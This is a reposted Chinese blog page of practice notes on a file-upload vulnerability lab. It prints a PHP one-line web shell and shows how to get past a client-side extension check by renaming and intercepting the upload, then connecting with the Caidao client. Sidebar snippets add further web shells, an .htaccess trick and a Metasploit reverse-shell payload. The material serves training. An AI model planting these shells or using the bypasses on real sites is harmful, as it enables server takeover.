文件上传漏洞练习笔记(1)

最新推荐文章于 2021-04-16 19:03:44 发布
最新推荐文章于 2021-04-16 19:03:44 发布
阅读量121 收藏
点赞数
文章标签: php
原文链接:http://blog.51cto.com/antivirusjo/2059618
版权

(1)打开网站
文件上传漏洞练习笔记(1)
(2)我们注意到一个图片上传,先传个jpg看看
文件上传漏洞练习笔记(1)
(3)结果中可以看到Stored in: upload/Tulips.jpg
先记一下,这个是文件的保存路径,后边会用到。
下边开始看看传其他文件,php,或随便一个后缀名文件,探究他的过滤能力
我写了个php文件为1text.php

<?php @eval($_POST['c']);?>

文件上传漏洞练习笔记(1)

(4)我们发现不能上传文件,可是又抓包抓不到,可以判定,在本地做了文件过滤
这时候,我们可以看看源代码,发现有后缀名的校验

文件上传漏洞练习笔记(1)

(5)我们现在把1test.php改为1test.jpg

文件上传漏洞练习笔记(1)

(6)可以发现文件是可以上传成功的。
文件上传漏洞练习笔记(1)

(7)但显然,这个也不是我们要的结果,jpg格式不能直接解析
这个时候,我们想想是不是可以在上传的时候将文件名改回php

文件上传漏洞练习笔记(1)

(8)居然成功了,,我们菜刀连一下,。。网速太渣,就这样把

文件上传漏洞练习笔记(1)

(9)下边提升下难度,如果上传不成功,

 使用大小写测试,或加 1 2 3 4 5 等,再或者尝试pht文件

转载于:https://blog.51cto.com/antivirusjo/2059618

weixin_33727510
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网络安全自学篇] 三十一.文件之Upload-labs靶场及CTF题目01-10(四)
杨秀璋的专栏
12-16 1万+
这是作者的系列网络安全自学教程,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了编辑器漏洞和IIS高版本文件漏洞,包括FCKeditor、eWebEditor、畸形解析漏洞等;本篇文章将详细讲解Upload-labs靶场及文件漏洞10道CTF题目,并结合Caidao工具介绍拿站的流程及防御原理。如果文章对您有帮助,将是我创作的最大动力。
web网站文件漏洞和攻击-运维安全详细笔记
06-30
Web 网站文件漏洞和攻击 - 运维安全详细笔记 文件漏洞是 Web 应用程序中的一种常见漏洞,攻击者可以通过上恶意文件来获取服务器的控制权。本文将详细介绍文件漏洞的原理、实验步骤和防御方法。 一、...
文件漏洞靶场upload-labs
09-27
文件漏洞靶场upload-labs,用于练习文件漏洞,学习web安全的小白可用。我的博客也有详细的使用教程
文件漏洞靶场练习笔记
weixin_44664530的博客
03-10 191
1.关闭js即可上:注:本关完成后将js打开否则可能接下来无法查看提示; 2.修改抓包修改type: 3.抓包文件名后加数字: 注:若不成功原因,phpstyudy不解析找到httpd文件 添加phtml php5 等: 4.上一个.htaccess文件<FilesMatch "这里填图片码文件名">SetHandler application/x-httpd-php</Fi...
关于文件漏洞靶场upload-labs的入门练习及思路
xiaobai的博客
04-22 1016
本次实验用到的环境:Phpstudy,burpsuite(以下简称bp),和文件靶场upload-labs,渗透版火狐浏览器,中国菜刀/蚁剑。 步入正题 先将靶场环境放于phpstudy的网站根目录www,打开bp代理,浏览器设置本地代理: 将bp和浏览器代理都设置为127.0.0.1,在写一个一句话木马,这里我们采用php一句话木马,然后就可以开始了。 正式开始:第一关 我们先初步进行一...
漏洞学习——任意文件】航天神洁某系统存在任意文件漏洞
Fly_鹏程万里
02-22 736
漏洞细节 航天神洁(北京)环保科技有限公司是由中国航天系统科学与工程研究院、中国航天空气动力技术研究院、 航天投资控股 股份 有限公司 和中景恒基集团共同投资组建。 http://**.**.**.**/index.asp 漏洞地址: http://**.**.**.**/upload_flash.asp 通过上jpg图片,抓包改包为asp后缀 上成功后查看页面源代码可以得...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
2. 客户端浏览器利用本地包含文件漏洞进行攻击 a) 使用正常合法的小图片,使用工具插入攻击代码 b) 在网站上带木马的图片 c) 执行文件包含并生成后门 文件包含漏洞的防御措施: 1. 禁用文件包含功能 2. 限制...
python练习笔记1
02-17
python练习笔记1
Owasp Top10 漏洞笔记
最新发布
08-27
Owasp Top10 漏洞笔记 安全漏洞是 Web 应用程序中的一个常见问题,OWASP Top 10 是一个列表,列出了 Web 应用程序中十大最常见的安全漏洞,其中包括 SQL 注入漏洞、跨站脚本攻击、跨站请求伪造、敏感数据 exposures...
go web 第二天 学习笔记文件
diexibao5191的博客
01-12 75
package main import ( "crypto/md5" "fmt" "html/template" "io" "log" "net/http" "os" "strconv" "strings" "time" ) func sayHelloName(w htt...
文件笔记
weixin_30455067的博客
05-13 93
前端部分使用element框架 <el-upload class='avatar-uploader' action='actionUrl' :http-request="httpRequest" :show-file-list='false' :on-suc...
metasploit文件格式漏洞渗透攻击(成功生成doc)
天元喜羊羊的博客
05-13 2884
因为BT5R3失败了,所以现在换成了BT5R1。 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/mete
文件漏洞靶场upload-labs练习
weixin_44866139的博客
05-28 1457
下载地址:https://github.com/c0ny1/upload-labs php版本:推荐5.2.17(其他版本可能会导致部分Pass无法突破) php组件(扩展):php_gd2,php_exif(部分Pass需要开启这两个组件) apache:以moudel方式连接 Pass-01 由提示可知这是前端文件后缀检查 思路: 1、写一个一句话木马文件 2、修改文件后缀名为jpg 3、上木马文件,抓包 4、将文件后缀名修改为php,重放这个抓到的包 5、用菜刀连上一句话木马文件,获得webshe
DVWA靶场--文件漏洞(low、medium、high等级)
c_programj的博客
04-16 7980
dvwa靶场实践-低中高三个安全等级安全等级:Low安全等级:Medium安全等级:High 关于Webshell Webshell常常被称为入侵者通过网站端口对网站服务器的某种程度上操作的权限。 小马:一句话木马也称为了小马,即整个shell代码量只有一行,一般是系统执行函数。 大马:代码量和功能比小马多,一般会进行二次编码加密,防止被安全防火墙/入侵系统检测到。 shell2.php #eval使用php函数,例如phpinfo( ) <?php eval($_REQUEST[‘cmd’]);?
文件漏洞及解析漏洞总结
weixin_34407348的博客
10-25 1564
文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种***方式是最为直接和有效的,“文件”本身没有问题,有问题的是文件后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。文件后导致的常见安全问题一般有:1)上文件是Web脚本语言,服务器的Web容器解释并执行了用户上的脚本,导致代码执...
Web渗透之文件漏洞总结
weixin_30764883的博客
01-28 1004
From:https://www.secpulse.com/archives/95987.html 概述 文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。常见场景是web服务器允许用户上图片或者普通文本文件保存,而用户绕过上机制上恶意代码并执行从而控制服务器。显然这种漏洞是getshell最快最直接的方法之一,需要说明的是上文件操作本身...
ctf-web:关于文件漏洞的深入研究
热门推荐
薯片薯条的博客
10-14 8万+
上次我们研究了关于文件漏洞,这次我们研究的内容属于上节课的补充内容,关于文件的绕过与防御. 怎么说呢,算是一种锻炼吧. 因为下个月有个awd的比赛,因此最近会经常发一些关于web的内容. 其实我还是挺慌的,因为以前参加的都是ctf线上赛,而且我做的都是逆向这个方面的,然而这次突然来了个web,搞得我有点懵. web也是最近才开始研究的,所以写的可能不尽人意,希望各位大佬看看就好,不喜勿喷. 一.实验环境 我们这次的实验依然用的是上次的网站和phpstudy.我发在了下面. 1.upload-f.
文件漏洞靶场 upload-lab靶场
weixin_43027842的博客
11-03 2001
需要工具:burpsuite 第一关 没有任何的过滤 接下来上一个马 抓包上改下后缀 访问

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值